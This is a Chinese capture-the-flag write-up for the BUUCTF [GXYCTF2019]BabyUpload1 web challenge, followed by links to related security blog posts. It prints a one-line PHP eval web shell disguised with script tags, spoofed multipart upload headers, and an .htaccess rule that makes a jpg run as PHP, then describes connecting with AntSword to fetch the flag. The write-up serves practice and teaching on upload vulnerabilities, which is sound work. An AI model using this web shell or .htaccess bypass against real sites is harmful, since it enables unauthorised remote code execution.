BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析

解题思路

打开靶场,看到文件上传位置

结合题目,是一道文件上传题。

题目考察的跟之前有一道基本一样,图片内容并没有检查,检查了后缀名、文件类型以及文件是否有php内容,过滤还是比较丰富的。

这里双写绕过、后缀绕过基本不行。首先我们要绕过php内容检测,用基本的script绕过就可以

复制代码
<script language="php">@eval($_POST['123']);</script>

我认为比较坑的来了,这里要用jpg,不能用png,感觉题目是把p这个字符给过滤了...

我上传真的图片.png,都给我拦截了...

复制代码
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

然后就是老演员,解析文件.htaccess,可以让我们的jpg文件解析成php文件

复制代码
ontent-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后用蚁剑连接即可,这里注意路径,从upload开始哈

最终在根目录下找到flag

总结

一道基础的文件上传解析漏洞,那个png上传不了,给我弄迷糊了...连接上去看了下源码

还真不给上传Png..

相关推荐
lingggggaaaa1 分钟前
小迪安全v2023学习笔记(七十九讲)—— 中间件安全&IIS&Apache&Tomcat&Nginx&CVE
笔记·学习·安全·web安全·网络安全·中间件·apache
淮北4943 小时前
计算机网络学习(七、网络安全)
学习·计算机网络·web安全
爱隐身的官人5 小时前
新后端漏洞(上)- Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
网络·安全·web安全·spel表达式注入命令执行
星马梦缘6 小时前
计算机网络7 第七章 网络安全
网络·计算机网络·安全·web安全·非对称加密·对称加密
weixin_446260856 小时前
探索网络安全的利器:theHarvester
安全·web安全
jieyu11197 小时前
内网后渗透攻击--linux系统(权限维持)
网络安全·内网渗透
m0_738120727 小时前
CTFshow系列——PHP特性Web97-100
开发语言·安全·web安全·php·ctfshow
Suckerbin7 小时前
Basic Pentesting: 1靶场渗透
笔记·安全·web安全·网络安全
qingtian!9 小时前
matrix-breakout-2-morpheus靶机渗透
网络安全·渗透测试·靶机复现
小韩博10 小时前
Windows权限提升(二)
windows·网络安全·github